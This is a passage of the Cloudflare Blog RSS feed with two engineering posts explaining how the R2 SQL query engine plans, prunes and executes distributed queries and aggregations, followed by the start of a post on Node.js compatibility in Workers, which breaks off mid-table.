
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Sat, 04 Apr 2026 00:20:56 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Announcing support for GROUP BY, SUM, and other aggregation queries in R2 SQL]]></title>
            <link>https://blog.cloudflare.com/r2-sql-aggregations/</link>
            <pubDate>Thu, 18 Dec 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s R2 SQL, a distributed query engine, now supports aggregations. Explore how we built distributed GROUP BY execution, using scatter-gather and shuffling strategies to run analytics directly over your R2 Data Catalog. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>When you’re dealing with large amounts of data, it’s helpful to get a quick overview — which is exactly what aggregations provide in SQL. Aggregations, known as “GROUP BY queries”, provide a bird’s eye view, so you can quickly gain insights from vast volumes of data.</p><p>That’s why we are excited to announce support for aggregations in <a href="https://blog.cloudflare.com/r2-sql-deep-dive/"><u>R2 SQL</u></a>, Cloudflare's serverless, distributed, analytics query engine, which is capable of running SQL queries over data stored in <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a>. Aggregations will allow users of <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> to spot important trends and changes in the data, generate reports and find anomalies in logs.</p><p>This release builds on the already supported filter queries, which are foundational for analytical workloads, and allow users to find needles in haystacks of <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> files.</p><p>In this post, we’ll unpack the utility and quirks of aggregations, and then dive into how we extended R2 SQL to support running such queries over vast amounts of data stored in R2 Data Catalog.</p>
    <div>
      <h2>The importance of aggregations in analytics</h2>
      <a href="#the-importance-of-aggregations-in-analytics">
        
      </a>
    </div>
    <p>Aggregations, or “GROUP BY queries”, generate a short summary of the underlying data.</p><p>A common use case for aggregations is generating reports. Consider a table called “sales”, which contains historical data of all sales across various countries and departments of some organisation. One could easily generate a report on the volume of sales by department using this aggregation query:</p>
            <pre><code>SELECT department, sum(value)
FROM sales
GROUP BY department</code></pre>
            <p>
The “GROUP BY” statement allows us to split table rows into buckets. Each bucket has a label corresponding to a particular department. Once the buckets are full, we can then calculate “sum(value)” for all rows in each bucket, giving us the total volume of sales performed by the corresponding department.</p><p>For some reports, we might only be interested in departments that had the largest volume. That’s where an “ORDER BY” statement comes in handy:</p>
            <pre><code>SELECT department, sum(value)
FROM sales
GROUP BY department
ORDER BY sum(value) DESC
LIMIT 10</code></pre>
            <p>Here we instruct the query engine to sort all department buckets by their total sales volume in the descending order and only return the top 10 largest.</p><p>Finally, we might be interested in filtering out anomalies. For example, we might want to only include departments that had more than five sales total in our report. We can easily do that with a “HAVING” statement:</p>
            <pre><code>SELECT department, sum(value), count(*)
FROM sales
GROUP BY department
HAVING count(*) &gt; 5
ORDER BY sum(value) DESC
LIMIT 10</code></pre>
            <p>Here we added a new aggregate function to our query — “count(*)” — which calculates how many rows ended up in each bucket. This directly corresponds to the number of sales in each department, so we have also added a predicate in the “HAVING” statement to make sure that we only leave buckets with more than five rows in them.</p>
    <div>
      <h2>Two approaches to aggregation: compute sooner or later</h2>
      <a href="#two-approaches-to-aggregation-compute-sooner-or-later">
        
      </a>
    </div>
    <p>Aggregation queries have a curious property: they can reference columns that are not stored anywhere. Consider “sum(value)”: this column is computed by the query engine on the fly, unlike the “department” column, which is fetched from Parquet files stored on R2. This subtle difference means that any query that references aggregates like “sum”, “count” and others needs to be split into two phases.</p><p>The first phase is computing new columns. If we are to sort the data by “count(*)” column using “ORDER BY” statement or filter rows based on it using “HAVING” statement, we need to know the values of this column. Once the values of columns like “count(*)” are known, we can proceed with the rest of the query execution.</p><p>Note that if the query does not reference aggregate functions in “HAVING” or “ORDER BY”, but still uses them in “SELECT”, we can make use of a trick. Since we do not need the values of aggregate functions until the very end, we can compute them partially and merge results just before we are about to return them to the user.</p><p>The key difference between the two approaches is when we compute aggregate functions: in advance, to perform some additional computations on them later; or on the fly, to iteratively build results the user needs.</p><p>First, we will dive into building results on the fly — a technique we call “scatter-gather aggregations.” We will then build on top of that to introduce “shuffling aggregations” capable of running extra computations like “HAVING” and “ORDER BY” on top of aggregate functions.</p>
    <div>
      <h2>Scatter-gather aggregations</h2>
      <a href="#scatter-gather-aggregations">
        
      </a>
    </div>
    <p>Aggregate queries without “HAVING” and “ORDER BY” can be executed in a fashion similar to filter queries. For filter queries, R2 SQL picks one node to be the coordinator in query execution. This node analyzes the query and consults R2 Data Catalog to figure out which Parquet row groups may contain data relevant to the query. Each Parquet row group represents a relatively small piece of work that a single compute node can handle. Coordinator node distributes the work across many worker nodes and collects results to return them to the user.</p><p>In order to execute aggregate queries, we follow all the same steps and distribute small pieces of work between worker nodes. However, this time instead of just filtering rows based on the predicate in the “WHERE” statement, worker nodes also compute <b>pre-aggregates</b>.</p><p>Pre-aggregates represent an intermediary state of an aggregation. This is an incomplete piece of data representing a partially computed aggregate function on a subset of data. Multiple pre-aggregates can be merged together to compute the final value of an aggregate function. Splitting aggregate functions into pre-aggregates allows us to horizontally scale computation of aggregation, making use of vast compute resources available in Cloudflare’s network.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Vh0x4qHkjOuQTrxSzkVKx/84c05ebf590cb4949b188f5856a4e951/image2.png" />
          </figure><p>For example, pre-aggregate for “count(*)” is simply a number representing the count of rows in a subset of data. Computing the final “count(*)” is as easy as adding these numbers together. Pre-aggregate for “avg(value)” consists of two numbers: “sum(value)” and “count(*)”. The value of “avg(value)” can then be computed by adding together all “sum(value)” values, adding together all “count(*)” values and finally dividing one number by the other.</p><p>Once worker nodes have finished computing the pre-aggregates, they stream results to the coordinator node. The coordinator node collects all results, computes final values of aggregate functions from pre-aggregates, and returns the result to the user.</p>
    <div>
      <h2>Shuffling, beyond the limits of scatter-gather</h2>
      <a href="#shuffling-beyond-the-limits-of-scatter-gather">
        
      </a>
    </div>
    <p>Scatter-gather is highly efficient when the coordinator can compute the final result by merging small, partial states from workers. If you run a query like <code>SELECT sum(sales) FROM orders</code>, the coordinator receives a single number from each worker and adds them up. The memory footprint on the coordinator is negligible regardless of how much data resides in R2.</p><p>However, this approach becomes inefficient when the query requires sorting or filtering based on the <i>result</i> of an aggregation. Consider this query, which finds the top two departments by sales volume:</p>
            <pre><code>SELECT department, sum(sales)
FROM sales
GROUP BY department
ORDER BY sum(sales) DESC
LIMIT 2</code></pre>
            <p>Correctly determining the global Top 2 requires knowing the total sales for every department across the entire dataset. Because the data is spread effectively at random across the underlying Parquet files, sales for a specific department are likely split across many different workers. A department might have low sales on every individual worker, excluding it from any local Top 2 list, yet have the highest sales volume globally when summed together.</p><p>The diagram below illustrates how a scatter-gather approach would not work for this query. "Dept A" is the global sales leader, but because its sales are evenly spread across workers, it doesn’t make to some local Top 2 lists, and ends up being discarded by the coordinator.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZJ6AfXzepKtJhiL6DcjiJ/07f4f523d871b25dcf444ee2ada546bd/image4.png" />
          </figure><p>Consequently, when the query orders results by their global aggregation, the coordinator cannot rely on pre-filtered results from workers. It must request the total count for <i>every</i> department from <i>every</i> worker to calculate the global totals before it can sort them. If you are grouping by a high-cardinality column like IP addresses or User IDs, this forces the coordinator to ingest and merge millions of rows, creating a resource bottleneck on a single node.</p><p>To solve this, we need <b>shuffling</b>, a way to colocate data for specific groups before the final aggregation occurs.</p>
    <div>
      <h3>Shuffling of aggregation data</h3>
      <a href="#shuffling-of-aggregation-data">
        
      </a>
    </div>
    <p>To address the challenges of random data distribution, we introduce a <b>shuffling stage</b>. Instead of sending results to the coordinator, workers exchange data directly with each other to colocate rows based on their grouping key.</p><p>This routing relies on <b>deterministic hash partitioning</b>. When a worker processes a row, it hashes the <code>GROUP BY</code> column to identify the destination worker. Because this hash is deterministic, every worker in the cluster independently agrees on where to send specific data. If "Engineering" hashes to Worker 5, every worker knows to route "Engineering" rows to Worker 5. No central registry is required.</p><p>The diagram below illustrates this flow. Notice how "Dept A" starts on Workers 1, 2 and 3. Because the hash function maps "Dept A" to Worker 1, all workers route those rows to that same destination.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Mw7FvL7ZJgDZqnh3ygkZM/9cfb493b5889d7efe43e4719d9523c93/image1.png" />
          </figure><p>Shuffling aggregates produces the correct results. However, this all-to-all exchange creates a timing dependency. If Worker 1 begins calculating the final total for "Dept A" before Worker 3 has finished sending its share of the data, the result will be incomplete.</p><p>To address this, we enforce a strict <b>synchronization barrier</b>. The coordinator tracks the progress of the entire cluster while workers buffer their outgoing data and flush it via <a href="https://grpc.io/"><u>gRPC</u></a> streams to their peers. Only when every worker confirms that it has finished processing its input files and flushing its shuffle buffers does the coordinator issue the command to proceed. This barrier guarantees that when the next stage begins, the dataset on each worker is complete and accurate.</p>
    <div>
      <h3>Local finalization</h3>
      <a href="#local-finalization">
        
      </a>
    </div>
    <p>Once the synchronization barrier is lifted, every worker holds the complete dataset for its assigned groups. Worker 1 now has 100% of the sales records for "Dept A" and can calculate the final total with certainty.</p><p>This allows us to push computational logic like filtering and sorting down to the worker rather than burdening the coordinator. For example, if the query includes <code>HAVING count(*) &gt; 5</code>, the worker can filter out groups that do not meet this criteria immediately after aggregation.</p><p>At the end of this stage, each worker produces a sorted, finalized stream of results for the groups it owns.</p>
    <div>
      <h3>The streaming merge</h3>
      <a href="#the-streaming-merge">
        
      </a>
    </div>
    <p>The final piece of the puzzle is the coordinator. In the scatter-gather model, the coordinator was responsible for the expensive task of aggregating and sorting the entire dataset. In the shuffling model, its role changes.</p><p>Because the workers have already computed the final aggregates and sorted them locally, the coordinator only needs to perform a <b>k-way merge</b>. It opens a stream to every worker and reads the results row by row. It compares the current row from each worker, picks the "winner" based on the sort order, and adds it to the query results that will be sent to the user.</p><p>This approach is particularly powerful for <code>LIMIT</code> queries. If a user asks for the top 10 departments, the coordinator merges the streams until it has found the top 10 items and then immediately stops processing. It does not need to load or merge the millions of remaining rows, allowing for greater scale of operation without over-consumption of compute resources.</p>
    <div>
      <h2>A powerful engine for processing massive datasets</h2>
      <a href="#a-powerful-engine-for-processing-massive-datasets">
        
      </a>
    </div>
    <p>With the addition of aggregations, <a href="https://developers.cloudflare.com/r2-sql/?cf_target_id=84F4CFDF79EFE12291D34EF36907F300"><u>R2 SQL</u></a> transforms from a tool great for filtering data into a powerful engine capable of data processing on massive datasets. This is made possible by implementing distributed execution strategies like scatter-gather and shuffling, where we are able to push the compute to where the data lives, using the scale of Cloudflare’s global compute and network. </p><p>Whether you are generating reports, monitoring high-volume logs for anomalies, or simply trying to spot trends in your data, you can now easily do it all within Cloudflare’s Developer Platform without the overhead of managing complex OLAP infrastructure or moving data out of R2.</p>
    <div>
      <h2>Try it now</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>Support for aggregations in R2 SQL is available today. We are excited to see how you use these new functions with data in R2 Data Catalog.</p><ul><li><p><b>Get Started:</b> Check out our <a href="https://developers.cloudflare.com/r2-sql/sql-reference/"><u>documentation</u></a> for examples and syntax guides on running aggregation queries.</p></li><li><p><b>Join the Conversation:</b> If you have questions, feedback, or want to share what you’re building, join us in the Cloudflare <a href="https://discord.com/invite/cloudflaredev"><u>Developer Discord</u></a>.</p></li></ul><p></p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">1qWQCp4QfhsZAs27s7fEc0</guid>
            <dc:creator>Jérôme Schneider</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Marc Selwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 SQL: a deep dive into our new distributed query engine]]></title>
            <link>https://blog.cloudflare.com/r2-sql-deep-dive/</link>
            <pubDate>Thu, 25 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 SQL provides a built-in, serverless way to run ad-hoc analytic queries against your R2 Data Catalog. This post dives deep under the Iceberg into how we built this distributed engine. ]]></description>
            <content:encoded><![CDATA[ <p>How do you run SQL queries over petabytes of data… without a server?</p><p>We have an answer for that: <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a>, a serverless query engine that can sift through enormous datasets and return results in seconds.</p><p>This post details the architecture and techniques that make this possible. We'll walk through our Query Planner, which uses <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> to prune terabytes of data before reading a single byte, and explain how we distribute the work across Cloudflare’s <a href="https://www.cloudflare.com/network"><u>global network</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> for massively parallel execution.</p>
    <div>
      <h3>From catalog to query</h3>
      <a href="#from-catalog-to-query">
        
      </a>
    </div>
    <p>During Developer Week 2025, we <a href="https://blog.cloudflare.com/r2-data-catalog-public-beta/"><u>launched</u></a> R2 Data Catalog, a managed <a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> catalog built directly into your Cloudflare R2 bucket. Iceberg is an open table format that provides critical database features like transactions and schema evolution for petabyte-scale <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. It gives you a reliable catalog of your data, but it doesn’t provide a way to query it.</p><p>Until now, reading your R2 Data Catalog required setting up a separate service like <a href="https://spark.apache.org/"><u>Apache Spark</u></a> or <a href="https://trino.io/"><u>Trino</u></a>. Operating these engines at scale is not easy: you need to provision clusters, manage resource usage, and be responsible for their availability, none of which contributes to the primary goal of getting value from your data.</p><p><a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> removes that step entirely. It’s a serverless query engine that executes retrieval SQL queries against your Iceberg tables, right where your data lives.</p>
    <div>
      <h3>Designing a query engine for petabytes</h3>
      <a href="#designing-a-query-engine-for-petabytes">
        
      </a>
    </div>
    <p>Object storage is fundamentally different from a traditional database’s storage. A database is structured by design; R2 is an ocean of objects, where a single logical table can be composed of potentially millions of individual files, large and small, with more arriving every second.</p><p>Apache Iceberg provides a powerful layer of logical organization on top of this reality. It works by managing the table's state as an immutable series of snapshots, creating a reliable, structured view of the table by manipulating lightweight metadata files instead of rewriting the data files themselves.</p><p>However, this logical structure doesn't change the underlying physical challenge: an efficient query engine must still find the specific data it needs within that vast collection of files, and this requires overcoming two major technical hurdles:</p><p><b>The I/O problem</b>: A core challenge for query efficiency is minimizing the amount of data read from storage. A brute-force approach of reading every object is simply not viable. The primary goal is to read only the data that is absolutely necessary.</p><p><b>The Compute problem</b>: The amount of data that does need to be read can still be enormous. We need a way to give the right amount of compute power to a query, which might be massive, for just a few seconds, and then scale it down to zero instantly to avoid waste.</p><p>Our architecture for R2 SQL is designed to solve these two problems with a two-phase approach: a <b>Query Planner</b> that uses metadata to intelligently prune the search space, and a <b>Query Execution</b> system that distributes the work across Cloudflare's global network to process the data in parallel.</p>
    <div>
      <h2>Query Planner</h2>
      <a href="#query-planner">
        
      </a>
    </div>
    <p>The most efficient way to process data is to avoid reading it in the first place. This is the core strategy of the R2 SQL Query Planner. Instead of exhaustively scanning every file, the planner makes use of the metadata structure provided by R2 Data Catalog to prune the search space, that is, to avoid reading huge swathes of data irrelevant to a query.</p><p>This is a top-down investigation where the planner navigates the hierarchy of Iceberg metadata layers, using <b>stats</b> at each level to build a fast plan, specifying exactly which byte ranges the query engine needs to read.</p>
    <div>
      <h3>What do we mean by “stats”?</h3>
      <a href="#what-do-we-mean-by-stats">
        
      </a>
    </div>
    <p>When we say the planner uses "stats" we are referring to summary metadata that Iceberg stores about the contents of the data files. These statistics create a coarse map of the data, allowing the planner to make decisions about which files to read, and which to ignore, without opening them.</p><p>There are two primary levels of statistics the planner uses for pruning:</p><p><b>Partition-level stats</b>: Stored in the Iceberg manifest list, these stats describe the range of partition values for all the data in a given Iceberg manifest file. For a partition on <code>day(event_timestamp)</code>, this would be the earliest and latest day present in the files tracked by that manifest.</p><p><b>Column-level stats</b>: Stored in the manifest files, these are more granular stats about each individual data file. Data files in R2 Data Catalog are formatted using the <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a>. For every column of a Parquet file, the manifest stores key information like:</p><ul><li><p>The minimum and maximum values. If a query asks for <code>http_status = 500</code>, and a file’s stats show its <code>http_status</code> column has a min of 200 and a max of 404, that entire file can be skipped.</p></li><li><p>A count of null values. This allows the planner to skip files when a query specifically looks for non-null values (e.g.,<code> WHERE error_code IS NOT NULL</code>) and the file's metadata reports that all values for <code>error_code</code> are null.</p></li></ul><p>Now, let's see how the planner uses these stats as it walks through the metadata layers.</p>
    <div>
      <h3>Pruning the search space</h3>
      <a href="#pruning-the-search-space">
        
      </a>
    </div>
    <p>The pruning process is a top-down investigation that happens in three main steps:</p><ol><li><p><b>Table metadata and the current snapshot</b></p></li></ol><p>The planner begins by asking the catalog for the location of the current table metadata. This is a JSON file containing the table's current schema, partition specs, and a log of all historical snapshots. The planner then fetches the latest snapshot to work with.</p><p>2. <b>Manifest list and partition pruning</b></p><p>The current snapshot points to a single Iceberg manifest list. The planner reads this file and uses the partition-level stats for each entry to perform the first, most powerful pruning step, discarding any manifests whose partition value ranges don't satisfy the query. For a table partitioned by <code>day(event_timestamp</code>), the planner can use the min/max values in the manifest list to immediately discard any manifests that don't contain data for the days relevant to the query.</p><p>3.<b> Manifests and file-level pruning</b></p><p>For the remaining manifests, the planner reads each one to get a list of the actual Parquet data files. These manifest files contain more granular, column-level stats for each individual data file they track. This allows for a second pruning step, discarding entire data files that cannot possibly contain rows matching the query's filters.</p><p>4. <b>File row-group pruning</b></p><p>Finally, for the specific data files that are still candidates, the Query Planner uses statistics stored inside Parquet file's footers to skip over entire row groups.</p><p>The result of this multi-layer pruning is a precise list of Parquet files, and of row groups within those Parquet files. These become the query work units that are dispatched to the Query Execution system for processing.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GKvgbex2vhIBqQ1G5UFjQ/2a99db7ae786b8e22a326bac0c9037d9/1.png" />
          </figure>
    <div>
      <h3>The Planning pipeline</h3>
      <a href="#the-planning-pipeline">
        
      </a>
    </div>
    <p>In R2 SQL, the multi-layer pruning we've described so far isn't a monolithic process. For a table with millions of files, the metadata can be too large to process before starting any real work. Waiting for a complete plan would introduce significant latency.</p><p>Instead, R2 SQL treats planning and execution together as a concurrent pipeline. The planner's job is to produce a stream of work units for the executor to consume as soon as they are available.</p><p>The planner’s investigation begins with two fetches to get a map of the table's structure: one for the table’s snapshot and another for the manifest list.</p>
    <div>
      <h4>Starting execution as early as possible</h4>
      <a href="#starting-execution-as-early-as-possible">
        
      </a>
    </div>
    <p>From that point on, the query is processed in a streaming fashion. As the Query Planner reads through the manifest files and subsequently the data files they point to and prunes them, it immediately emits any matching data files/row groups as work units to the execution queue.</p><p>This pipeline structure ensures the compute nodes can begin the expensive work of data I/O almost instantly, long before the planner has finished its full investigation.</p><p>On top of this pipeline model, the planner adds a crucial optimization: <b>deliberate ordering</b>. The manifest files are not streamed in an arbitrary sequence. Instead, the planner processes them in an order matching by the query's <code>ORDER BY</code> clause, guided by the metadata stats. This ensures that the data most likely to contain the desired results is processed first.</p><p>These two concepts work together to address query latency from both ends of the query pipeline.</p><p>The streamed planning pipeline lets us start crunching data as soon as possible, minimizing the delay before the first byte is processed. At the other end of the pipeline, the deliberate ordering of that work lets us finish early by finding a definitive result without scanning the entire dataset.</p><p>The next section explains the mechanics behind this "finish early" strategy.</p>
    <div>
      <h4>Stopping early: how to finish without reading everything</h4>
      <a href="#stopping-early-how-to-finish-without-reading-everything">
        
      </a>
    </div>
    <p>Thanks to the Query Planner streaming work units in an order matching the <code>ORDER BY </code>clause, the Query Execution system first processes the data that is most likely to be in the final result set.</p><p>This prioritization happens at two levels of the metadata hierarchy:</p><p><b>Manifest ordering</b>: The planner first inspects the manifest list. Using the partition stats for each manifest (e.g., the latest timestamp in that group of files), it decides which entire manifest files to stream first.</p><p><b>Parquet file ordering</b>: As it reads each manifest, it then uses the more granular column-level stats to decide the processing order of the individual Parquet files within that manifest.</p><p>This ensures a constantly prioritized stream of work units is sent to the execution engine. This prioritized stream is what allows us to stop the query early.</p><p>For instance, with a query like ... <code>ORDER BY timestamp DESC LIMIT 5</code>, as the execution engine processes work units and sends back results, the planner does two things concurrently:</p><p>It maintains a bounded heap of the best 5 results seen so far, constantly comparing new results to the oldest timestamp in the heap.</p><p>It keeps a "high-water mark" on the stream itself. Thanks to the metadata, it always knows the absolute latest timestamp of any data file that has not yet been processed.</p><p>The planner is constantly comparing the state of the heap to the water mark of the remaining stream. The moment the oldest timestamp in our Top 5 heap is newer than the high-water mark of the remaining stream, the entire query can be stopped.</p><p>At that point, we can prove no remaining work unit could possibly contain a result that would make it into the top 5. The pipeline is halted, and a complete, correct result is returned to the user, often after reading only a fraction of the potentially matching data.</p><p>Currently, R2 SQL supports ordering on columns that are part of the table's partition key only. This is a limitation we are working on lifting in the future.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qN9TeEuRZJIidYXFictG/8a55cc6088be3abdc3b27878daa76e40/image4.png" />
          </figure>
    <div>
      <h3>Architecture</h3>
      <a href="#architecture">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3wkvnT24y5E0k5064cqu0T/939402d16583647986eec87617379900/image3.png" />
          </figure>
    <div>
      <h2>Query Execution</h2>
      <a href="#query-execution">
        
      </a>
    </div>
    <p>Query Planner streams the query work in bite-sized pieces called row groups. A single Parquet file usually contains multiple row groups, but most of the time only a few of them contain relevant data. Splitting query work into row groups allows R2 SQL to only read small parts of potentially multi-GB Parquet files.</p><p>The server that receives the user’s request and performs query planning assumes the role of query coordinator. It distributes the work across query workers and aggregates results before returning them to the user.</p><p>Cloudflare’s network is vast, and many servers can be in maintenance at the same time. The query coordinator contacts Cloudflare’s internal API to make sure only healthy, fully functioning servers are picked for query execution. Connections between coordinator and query worker go through <a href="https://www.cloudflare.com/en-gb/application-services/products/argo-smart-routing/"><u>Cloudflare Argo Smart Routing</u></a> to ensure fast, reliable connectivity.</p><p>Servers that receive query execution requests from the coordinator assume the role of query workers. Query workers serve as a point of horizontal scalability in R2 SQL. With a higher number of query workers, R2 SQL can process queries faster by distributing the work among many servers. That’s especially true for queries covering large amounts of files.</p><p>Both the coordinator and query workers run on Cloudflare’s distributed network, ensuring R2 SQL has plenty of compute power and I/O throughput to handle analytical workloads.</p><p>Each query worker receives a batch of row groups from the coordinator as well as an SQL query to run on it. Additionally, the coordinator sends serialized metadata about Parquet files containing the row groups. Thanks to that, query workers know exact byte offsets where each row group is located in the Parquet file without the need to read this information from R2.</p>
    <div>
      <h3>Apache DataFusion</h3>
      <a href="#apache-datafusion">
        
      </a>
    </div>
    <p>Internally, each query worker uses <a href="https://github.com/apache/datafusion"><u>Apache DataFusion</u></a> to run SQL queries against row groups. DataFusion is an open-source analytical query engine written in Rust. It is built around the concept of partitions. A query is split into multiple concurrent independent streams, each working on its own partition of data.</p><p>Partitions in DataFusion are similar to partitions in Iceberg, but serve a different purpose. In Iceberg, partitions are a way to physically organize data on object storage. In DataFusion, partitions organize in-memory data for query processing. While logically they are similar – rows grouped together based on some logic – in practice, a partition in Iceberg doesn’t always correspond to a partition in DataFusion.</p><p>DataFusion partitions map perfectly to the R2 SQL query worker’s data model because each row group can be considered its own independent partition. Thanks to that, each row group is processed in parallel.</p><p>At the same time, since row groups usually contain at least 1000 rows, R2 SQL benefits from vectorized execution. Each DataFusion partition stream can execute the SQL query on multiple rows in one go, amortizing the overhead of query interpretation.</p><p>There are two ends of the spectrum when it comes to query execution: processing all rows sequentially in one big batch and processing each individual row in parallel. Sequential processing creates a so-called “tight loop”, which is usually more CPU cache friendly. In addition to that, we can significantly reduce interpretation overhead, as processing a large number of rows at a time in batches means that we go through the query plan less often. Completely parallel processing doesn’t allow us to do these things, but makes use of multiple CPU cores to finish the query faster.</p><p>DataFusion’s architecture allows us to achieve a balance on this scale, reaping benefits from both ends. For each data partition, we gain better CPU cache locality and amortized interpretation overhead. At the same time, since many partitions are processed in parallel, we distribute the workload between multiple CPUs, cutting the execution time further.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Tis1F5C1x3x6sIyJLL8ju/aae094818b1b7f6f8d6f857305948fbd/image1.png" />
          </figure><p>In addition to the smart query execution model, DataFusion also provides first-class Parquet support.</p><p>As a file format, Parquet has multiple optimizations designed specifically for query engines. Parquet is a column-based format, meaning that each column is physically separated from others. This separation allows better compression ratios, but it also allows the query engine to read columns selectively. If the query only ever uses five columns, we can only read them and skip reading the remaining fifty. This massively reduces the amount of data we need to read from R2 and the CPU time spent on decompression.</p><p>DataFusion does exactly that. Using R2 ranged reads, it is able to read parts of the Parquet files containing the requested columns, skipping the rest.</p><p>DataFusion’s optimizer also allows us to push down any filters to the lowest levels of the query plan. In other words, we can apply filters right as we are reading values from Parquet files. This allows us to skip materialization of results we know for sure won’t be returned to the user, cutting the query execution time further.</p>
    <div>
      <h3>Returning query results</h3>
      <a href="#returning-query-results">
        
      </a>
    </div>
    <p>Once the query worker finishes computing results, it returns them to the coordinator through <a href="https://grpc.io/"><u>the gRPC protocol</u></a>.</p><p>R2 SQL uses <a href="https://arrow.apache.org/"><u>Apache Arrow</u></a> for internal representation of query results. Arrow is an in-memory format that efficiently represents arrays of structured data. It is also used by DataFusion during query execution to represent partitions of data.</p><p>In addition to being an in-memory format, Arrow also defines the <a href="https://arrow.apache.org/docs/format/Columnar.html#format-ipc"><u>Arrow IPC</u></a> serialization format. Arrow IPC isn’t designed for long-term storage of the data, but for inter-process communication, which is exactly what query workers and the coordinator do over the network. The query worker serializes all the results into the Arrow IPC format and embeds them into the gRPC response. The coordinator in turn deserializes results and can return to working on Arrow arrays.</p>
    <div>
      <h2>Future plans</h2>
      <a href="#future-plans">
        
      </a>
    </div>
    <p>While R2 SQL is currently quite good at executing filter queries, we also plan to rapidly add new capabilities over the coming months. This includes, but is not limited to, adding:</p><ul><li><p>Support for complex aggregations in a distributed and scalable fashion;</p></li><li><p>Tools to help provide visibility in query execution to help developers improve performance;</p></li><li><p>Support for many of the configuration options Apache Iceberg supports.</p></li></ul><p>In addition to that, we have plans to improve our developer experience by allowing users to query their R2 Data Catalogs using R2 SQL from the Cloudflare Dashboard.</p><p>Given Cloudflare’s distributed compute, network capabilities, and ecosystem of developer tools, we have the opportunity to build something truly unique here. We are exploring different kinds of indexes to make R2 SQL queries even faster and provide more functionality such as full text search, geospatial queries, and more. </p>
    <div>
      <h2>Try it now!</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>It’s early days for R2 SQL, but we’re excited for users to get their hands on it. R2 SQL is available in open beta today! Head over to our<a href="https://developers.cloudflare.com/r2-sql/get-started/"> <u>getting started guide</u></a> to learn how to create an end-to-end data pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL.</p><p>
We’re excited to see what you build! Come share your feedback with us on our<a href="http://discord.cloudflare.com/"> <u>Developer Discord</u></a>.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">7znvjodLkg1AxYlR992it2</guid>
            <dc:creator>Yevgen Safronov</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Jérôme Schneider</dc:creator>
        </item>
        <item>
            <title><![CDATA[A year of improving Node.js compatibility in Cloudflare Workers]]></title>
            <link>https://blog.cloudflare.com/nodejs-workers-2025/</link>
            <pubDate>Thu, 25 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Over the year we have greatly expanded Node.js compatibility. There are hundreds of new Node.js APIs now available that make it easier to run existing Node.js code on our platform. ]]></description>
            <content:encoded><![CDATA[ <p>We've been busy.</p><p>Compatibility with the broad JavaScript developer ecosystem has always been a key strategic investment for us. We believe in open standards and an open web. We want you to see <a href="https://workers.cloudflare.com/"><u>Workers</u></a> as a powerful extension of your development platform with the ability to just drop code in that Just Works. To deliver on this goal, the Cloudflare Workers team has spent the past year significantly expanding compatibility with the Node.js ecosystem, enabling hundreds (if not thousands) of popular <a href="https://npmjs.com"><u>npm</u></a> modules to now work seamlessly, including the ever popular <a href="https://expressjs.com"><u>express</u></a> framework.</p><p>We have implemented a <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>substantial subset of the Node.js standard library</u></a>, focusing on the most commonly used, and asked for, APIs. These include:</p>
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Module</span></th>
    <th><span>API documentation</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>node:console</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/console.html"><span>https://nodejs.org/docs/latest/api/console.html</span></a><span> </span></td>
